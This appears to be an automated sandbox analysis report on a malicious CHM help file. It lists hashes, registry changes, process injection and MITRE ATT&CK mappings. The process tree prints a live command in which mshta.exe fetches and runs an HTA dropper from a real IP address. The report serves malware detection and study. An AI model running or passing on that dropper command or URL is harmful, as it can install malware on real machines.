ead97a3920ff557299bcd4ccde1770c759263b93b70414258ec9030bbd0cb750

Analysis

max time kernel
79s
max time network
126s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
12/04/2023, 02:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

40d6b60a30a8ea1f2911efcef19487e0.chm
Size

100KB
MD5

40d6b60a30a8ea1f2911efcef19487e0
SHA1

78e65b1f2860db8a12630173faa98f2bc184a898
SHA256

ead97a3920ff557299bcd4ccde1770c759263b93b70414258ec9030bbd0cb750
SHA512

83f6d8f4836088d673f3da4e758af69cf9ebe4b1135a39070f0171ea39b57553c616821bc1d2233711ff7525a9ddefd85a5315da2ca11113ff6aa3f69780fbcf
SSDEEP

1536:4bGN5bBPms1O9bKgJPV/EUNN5AkqqZDa6UZrVutluxh1oj6y3uf+/XOtJAMS:tTEsE9GOpfN5ApqZmHrkOh1zyf/X71

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://141.105.65.165/data/8.html

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
11	3416	mshta.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\International\CpMRU	hh.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Enable = "1"	hh.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Size = "10"	hh.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100"	hh.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpMRU\Factor = "20"	hh.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1612	hh.exe
1612	hh.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 1612 wrote to memory of 3416	1612	hh.exe	85
PID 1612 wrote to memory of 3416	1612	hh.exe	85

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\40d6b60a30a8ea1f2911efcef19487e0.chm
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1612
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" http://141.105.65.165/data/8.html ,
  2⤵
  - Blocklisted process makes network request
  PID:3416

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Windows 7 deprecation

Loading Replay Monitor...